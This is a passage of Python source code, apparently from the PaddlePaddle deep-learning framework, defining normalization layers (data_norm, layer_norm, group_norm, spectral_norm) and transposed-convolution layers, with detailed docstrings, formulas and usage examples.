data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
slot_dim=-1,
sync_stats=False,
summary_decay_rate=0.9999999):
"""
**Data Normalization Layer**
This op can be used as a normalizer function for conv2d and fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{m} \\sum_{i=1}^{m} x_i \\qquad &//\\
\ mini-batch\ mean \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{m} \\sum_{i=1}^{m}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ mini-batch\ variance \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
Args:
input(variable): The input variable which is a LoDTensor.
act(string, Default None): Activation type, linear|relu|prelu|...
epsilon(float, Default 1e-05):
param_attr(ParamAttr): The parameter attribute for Parameter `scale`.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
moving_mean_name(string, Default None): The name of moving_mean which store the global Mean.
moving_variance_name(string, Default None): The name of the moving_variance which store the global Variance.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance
should do model average when model average is enabled.
slot_dim(int): The embedding dimension of one slot. Slot is a set of one specific feature. In pslib mode, we
distinguish feature ids by slot and pull their embeddings from parameter server (pslib). The first
place of the embedding is the historical show number (occurence time of this feature id with a label 0).
If the input of this op is concated by slot-wise embeddings, and the show number is zero when this slot
is new or empty, the normalization result may be impractical. To avoid this, we add slot_dim to locate
the show number and judge if the show number is zero. If so, we choose to skip normalization on this
embedding.
sync_stats(bool, Default False): When running with multiple GPU cards, using allreduce to sync the
summary messages.
summary_decay_rate(float, Default 0.9999999): The decay rate when updating summary.
Returns:
Variable: A tensor variable which is the result after applying data normalization on the input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
hidden1 = fluid.data(name="hidden1", shape=[64, 200])
hidden2 = fluid.layers.data_norm(name="hidden2", input=hidden1)
"""
helper = LayerHelper('data_norm', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
batch_size_default = 1e4
batch_sum_default = 0.0
batch_square_sum_default = 1e4
if param_attr and isinstance(param_attr, dict):
batch_size_default = param_attr.get("batch_size", 1e4)
batch_sum_default = param_attr.get("batch_sum", 0.0)
batch_square_sum_default = param_attr.get("batch_square", 1e4)
# create parameter
batch_size = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_size',
initializer=Constant(value=float(batch_size_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
batch_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_sum',
initializer=Constant(value=float(batch_sum_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
batch_square_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_square_sum',
initializer=Constant(value=float(batch_square_sum_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
means = helper.create_variable(dtype=dtype, stop_gradient=True)
scales = helper.create_variable(dtype=dtype, stop_gradient=True)
data_norm_out = input if in_place else helper.create_variable(dtype=dtype)
helper.append_op(
type="data_norm",
inputs={
"X": input,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum
},
outputs={
"Y": data_norm_out,
"Means": means,
"Scales": scales,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum
},
attrs={
"epsilon": epsilon,
"slot_dim": slot_dim,
"sync_stats": sync_stats,
"summary_decay_rate": summary_decay_rate
})
return helper.append_activation(data_norm_out)
@templatedoc()
def layer_norm(input,
scale=True,
shift=True,
begin_norm_axis=1,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
name=None):
"""
**Layer Normalization Layer**
The API implements the function of the Layer Normalization Layer and can be applied to mini-batch input data.
Refer to `Layer Normalization <https://arxiv.org/pdf/1607.06450v1.pdf>`_
The formula is as follows:
.. math::
\\mu & = \\frac{1}{H}\\sum_{i=1}^{H} x_i
\\sigma & = \\sqrt{\\frac{1}{H}\sum_{i=1}^{H}{(x_i - \\mu)^2} + \\epsilon}
y & = f(\\frac{g}{\\sigma}(x - \\mu) + b)
- :math:`x`: the vector representation of the summed inputs to the neurons in that layer.
- :math:`H`: the number of hidden units in a layers
- :math:`\\epsilon`: the small value added to the variance to prevent division by zero.
- :math:`g`: the trainable scale parameter.
- :math:`b`: the trainable bias parameter.
Args:
input(Variable): A multi-dimension ``Tensor`` , and the data type is float32 or float64.
scale(bool, optional): Whether to learn the adaptive gain :math:`g` after
normalization. Default: True.
shift(bool, optional): Whether to learn the adaptive bias :math:`b` after
normalization. Default: True.
begin_norm_axis(int, optional): The normalization will be performed along
dimensions from :attr:`begin_norm_axis` to :attr:`rank(input)`.
Default: 1.
epsilon(float, optional): The small value added to the variance to prevent
division by zero. Default: 1e-05.
param_attr(ParamAttr, optional): The parameter attribute for the learnable
gain :math:`g`. If :attr:`scale` is False, :attr:`param_attr` is
omitted. If :attr:`scale` is True and :attr:`param_attr` is None,
a default :code:`ParamAttr` would be added as scale. The
:attr:`param_attr` is initialized as 1 if it is added. Default: None.
bias_attr(ParamAttr, optional): The parameter attribute for the learnable
bias :math:`b`. If :attr:`shift` is False, :attr:`bias_attr` is
omitted. If :attr:`shift` is True and :attr:`param_attr` is None,
a default :code:`ParamAttr` would be added as bias. The
:attr:`bias_attr` is initialized as 0 if it is added. Default: None.
act(str, optional): Activation to be applied to the output of layer normalization.
Default: None.
name(str): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: ``Tensor`` indicating the normalized result, the data type is the same as ``input`` , and the return dimension is the same as ``input`` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = fluid.data(name='x', shape=[-1, 32, 32], dtype='float32')
hidden1 = fluid.layers.layer_norm(input=x, begin_norm_axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
np_x = np.random.random(size=(8, 3, 32, 32)).astype('float32')
output = exe.run(feed={"x": np_x}, fetch_list = [hidden1])
print(output)
"""
assert in_dygraph_mode(
) is not True, "please use LayerNorm instead of layer_norm in dygraph mode!"
helper = LayerHelper('layer_norm', **locals())
dtype = helper.input_dtype()
# create intput and parameters
inputs = {'X': input}
input_shape = input.shape
param_shape = [reduce(lambda x, y: x * y, input_shape[begin_norm_axis:])]
if scale:
assert param_attr is not False, "param_attr should not be False when using scale."
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
inputs['Scale'] = scale
else:
if param_attr:
warnings.warn("param_attr is only available with scale is True.")
if shift:
assert bias_attr is not False, "bias_attr should not be False when using shift."
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
inputs['Bias'] = bias
else:
if bias_attr:
warnings.warn("bias_attr is only available with shift is True.")
# create output
mean_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
layer_norm_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="layer_norm",
inputs=inputs,
outputs={
"Y": layer_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={"epsilon": epsilon,
"begin_norm_axis": begin_norm_axis})
return helper.append_activation(layer_norm_out)
@templatedoc()
def group_norm(input,
groups,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
data_layout='NCHW',
name=None):
"""
**Group Normalization Layer**
Refer to `Group Normalization <https://arxiv.org/abs/1803.08494>`_ .
Parameters:
input(Variable): 4-D Tensor, the data type is float32 or float64.
groups(int): The number of groups that divided from channels, the data type
is int32.
epsilon(float, optional): The small value added to the variance to prevent
division by zero, the data type is float32. Default: 1e-05.
param_attr(ParamAttr|bool, optional): ParamAttr object that specifies weight parameter
attribute. If a bool type, only False is supported, which means there is no weight parameter.
Default: None, the default weight parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
bias_attr(ParamAttr|bool, optional): ParamAttr object that specifies bias parameter
attribute. If a bool type, only False is supported, which means there is no bias parameter.
Default: None, the default bias parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
act(str, optional): Activation to be applied to the output of group normalization.
data_layout(str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name (str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A 4-D Tensor has same data type and data format with `input`.
Raises:
ValueError: If `data_layout` is neither 'NCHW' nor 'NHWC'.
ValueError: If `groups` is greater than the number of input channels.
ValueError: If `groups` is less than 1.
ShapeError: If the param_attr(Scale) is not 1-D Tensor.
ShapeError: If the param_attr(Scale)'s first dimension size is not equal to the input channels.
ShapeError: If the bias_attr(Bias) is not 1-D Tensor.
ShapeError: If the bias_attr(Bias)'s first dimension size is not equal to the input channels.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 8, 32, 32], dtype='float32')
x = fluid.layers.group_norm(input=data, groups=4)
"""
helper = LayerHelper('group_norm', **locals())
dtype = helper.input_dtype()
# create intput and parameters
inputs = {'X': input}
input_shape = input.shape
if data_layout != 'NCHW' and data_layout != 'NHWC':
raise ValueError(
"Param(data_layout) of Op(fluid.layers.group_norm) got wrong value: received "
+ data_layout + " but only NCHW or NHWC supported.")
channel_num = input_shape[1] if data_layout == 'NCHW' else input_shape[-1]
param_shape = [channel_num]
if param_attr:
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
inputs['Scale'] = scale
if bias_attr:
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
inputs['Bias'] = bias
# create output
mean_out = helper.create_variable(dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable(dtype=dtype, stop_gradient=True)
group_norm_out = helper.create_variable(dtype=dtype)
helper.append_op(
type="group_norm",
inputs=inputs,
outputs={
"Y": group_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={
"epsilon": epsilon,
"groups": groups,
"data_layout": data_layout
})
return helper.append_activation(group_norm_out)
@templatedoc()
def spectral_norm(weight, dim=0, power_iters=1, eps=1e-12, name=None):
"""
**Spectral Normalization Layer**
This operation calculates the spectral normalization value of weight parameters of
fc, conv1d, conv2d, conv3d layers which should be 2-D, 3-D, 4-D, 5-D
Parameters. Output tensor will be in same shape with input tensor.
Calculations are showed as follows.
Step 1:
Generate vector U in shape of [H], and V in shape of [W].
While H is the :attr:`dim` th dimension of the input weights,
and W is the product result of remaining dimensions.
Step 2:
:attr:`power_iters` should be a positive integer, do following
calculations with U and V for :attr:`power_iters` rounds. Calculations
as follows:
.. math::
\mathbf{v} := \\frac{\mathbf{W}^{T} \mathbf{u}}{\|\mathbf{W}^{T} \mathbf{u}\|_2}
\mathbf{u} := \\frac{\mathbf{W}^{T} \mathbf{v}}{\|\mathbf{W}^{T} \mathbf{v}\|_2}
Step 3:
Calculate :math:`\sigma(\mathbf{W})` and normalize weight values.
.. math::
\sigma(\mathbf{W}) = \mathbf{u}^{T} \mathbf{W} \mathbf{v}
\mathbf{W} = \\frac{\mathbf{W}}{\sigma(\mathbf{W})}
Refer to `Spectral Normalization <https://arxiv.org/abs/1802.05957>`_ .
Args:
weight(${weight_type}): ${weight_comment}
dim(int): ${dim_comment}
power_iters(int): ${power_iters_comment}
eps(float): ${eps_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: A tensor variable of weight parameters after spectral normalization.
The data type and shape is same as input tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
weight = fluid.data(name='weight', shape=[2, 8, 32, 32], dtype='float32')
x = fluid.layers.spectral_norm(weight=weight, dim=1, power_iters=2)
"""
helper = LayerHelper('spectral_norm', **locals())
check_variable_and_dtype(weight, 'weight', ['float32', 'float64'],
'spectral_norm')
check_type(dim, 'dim', int, 'spectral_norm')
check_type(power_iters, 'power_iters', int, 'spectral_norm')
check_type(eps, 'eps', float, 'spectral_norm')
dtype = weight.dtype
# create intput and parameters
inputs = {'Weight': weight}
input_shape = weight.shape
h = input_shape[dim]
w = np.prod(input_shape) // h
u = helper.create_parameter(
attr=ParamAttr(),
shape=[h],
dtype=dtype,
default_initializer=Normal(0., 1.))
u.stop_gradient = True
inputs['U'] = u
v = helper.create_parameter(
attr=ParamAttr(),
shape=[w],
dtype=dtype,
default_initializer=Normal(0., 1.))
inputs['V'] = v
v.stop_gradient = True
# create output
out = helper.create_variable(dtype=dtype)
helper.append_op(
type="spectral_norm",
inputs=inputs,
outputs={"Out": out, },
attrs={
"dim": dim,
"power_iters": power_iters,
"eps": eps,
})
return out
def conv2d_transpose(input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCHW'):
"""
The convolution2D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCHW or NHWC format. Where N is batch size, C is the number of channels,
H is the height of the feature, and W is the width of the feature.
Parameters(dilations, strides, paddings) are two elements. These two elements
represent height and width, respectively. The details of convolution transpose
layer, please refer to the following explanation and references
`therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
Where:
* :math:`X`: Input value, a 4-D Tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a 4-D Tensor with MCHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, a 4-D Tensor with data format 'NCHW' or 'NHWC', the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - pad_height_top - pad_height_bottom + dilations[0] * (H_f - 1) + 1 \\\\
W^\prime_{out} &= (W_{in} - 1) * strides[1] - pad_width_left - pad_width_right + dilations[1] * (W_f - 1) + 1 \\\\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] ] \\\\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] ]
Note:
The conv2d_transpose can be seen as the backward of the conv2d. For conv2d,
when stride > 1, conv2d maps multiple input shape to the same output shape,
so for conv2d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`H_{out} = H^\prime_{out}, W_{out} = W^\prime_{out}`;
else, the :math:`H_{out}` of the output size must between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[0]`, and the :math:`W_{out}` of the output size must
between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[1]`,
conv2d_transpose can compute the kernel size automatically.
Args:
input(Variable): 4-D Tensor with [N, C, H, W] or [N, H, W, C] format,
its data type is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain two integers, (image_height, image_width). None if use
filter_size, padding, and stride to calculate output_size.
If output_size and filter_size are specified at the same time, They
should follow the formula above. Default: None. output_size and filter_size
should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None. filter_size and
output_size should not be None at the same time.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively adds
`dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a
string, either 'VALID' or 'SAME' supported, which is the padding algorithm.
If `padding` is a tuple or list, it could be in three forms:
`[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and
when `data_format` is `'NCHW'`,
`padding` can be in the form `[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NHWC'`, `padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain two integers, (dilation_height, dilation_width).
Otherwise, dilation_height = dilation_width = dilation. Default: dilation = 1.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None.
groups(int, optional): The groups number of the Conv2d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups = 1.
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv2d_transpose. If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv2d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True.
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv2d_transpose, whose
data type is the same with input and shape is (num_batches, channels, out_h,
out_w) or (num_batches, out_h, out_w, channels). If act is None, the tensor variable
storing the transposed convolution result, and if act is not None, the
tensor variable storing transposed convolution and non-linearity activation
result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d_transpose = fluid.layers.conv2d_transpose(input=data, num_filters=2, filter_size=3)
"""
assert param_attr is not False, "param_attr should not be False in conv2d_transpose."
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(fluid.layers.conv2d_transpose) got wrong value: received "
+ data_format + " but only NCHW or NHWC supported.")
input_channel = input.shape[1] if data_format == 'NCHW' else input.shape[-1]
op_type = 'conv2d_transpose'
if (input_channel == groups and num_filters == input_channel and
not use_cudnn):
op_type = 'depthwise_conv2d_transpose'
helper = LayerHelper(op_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv2d_transpose must be Variable")
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
else:
padding = utils.convert_to_list(padding, 2, 'padding')
padding = [padding[0], padding[0], padding[1], padding[1]]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size]
h_in = input.shape[2] if data_format == 'NCHW' else input.shape[1]
w_in = input.shape[3] if data_format == 'NCHW' else input.shape[2]
filter_size_h = (output_size[0] - (h_in - 1) * stride[0] + padding[0] +
padding[1] - 1) // dilation[0] + 1
filter_size_w = (output_size[1] - (w_in - 1) * stride[1] + padding[2] +
padding[3] - 1) // dilation[1] + 1
filter_size = [filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(filter_size, 2,
'conv2d_transpose.filter_size')
if len(padding) == 4 and utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr)
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'Input': [input],
'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
out = helper.append_activation(pre_act)
return out
def conv3d_transpose(input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCDHW'):
"""
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW or NDHWC format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a Tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a Tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D^\prime_{out} &= (D_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (D_f - 1) + 1 \\\\
H^\prime_{out} &= (H_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (H_f - 1) + 1 \\\\
W^\prime_{out} &= (W_{in} - 1) * strides[2] - 2 * paddings[2] + dilations[2] * (W_f - 1) + 1 \\\\
D_{out} &\in [ D^\prime_{out}, D^\prime_{out} + strides[0] ] \\\\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[1] ] \\\\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[2] ]
Note:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
when stride > 1, conv3d maps multiple input shape to the same output shape,
so for conv3d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`H_{out} = H^\prime_{out}, :math:`H_{out} = \
H^\prime_{out}, W_{out} = W^\prime_{out}`; else, the :math:`D_{out}` of the output
size must between :math:`D^\prime_{out}` and :math:`D^\prime_{out} + strides[0]`,
the :math:`H_{out}` of the output size must between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[1]`, and the :math:`W_{out}` of the output size must
between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[2]`,
conv3d_transpose can compute the kernel size automatically.
Args:
input(Variable): The input is 5-D Tensor with shape [N, C, D, H, W] or [N, D, H, W, C], the data type
of input is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain three integers, (image_depth, image_height, image_width). This
parameter only works when filter_size is None. If output_size and filter_size are
specified at the same time, They should follow the formula above. Default: None.
Output_size and filter_size should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size. None if use output size to
calculate filter_size. Default: None. filter_size and output_size should not be
None at the same time.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively
adds `dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a string,
either 'VALID' or 'SAME' supported, which is the padding algorithm. If `padding`
is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `'NCDHW'`, `padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NDHWC'`, `padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain three integers, (stride_depth, stride_height,
stride_width). Otherwise, stride_depth = stride_height = stride_width = stride.
Default: stride = 1.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups(int, optional): The groups number of the Conv3d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups=1
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv3d_transpose. If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv3d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
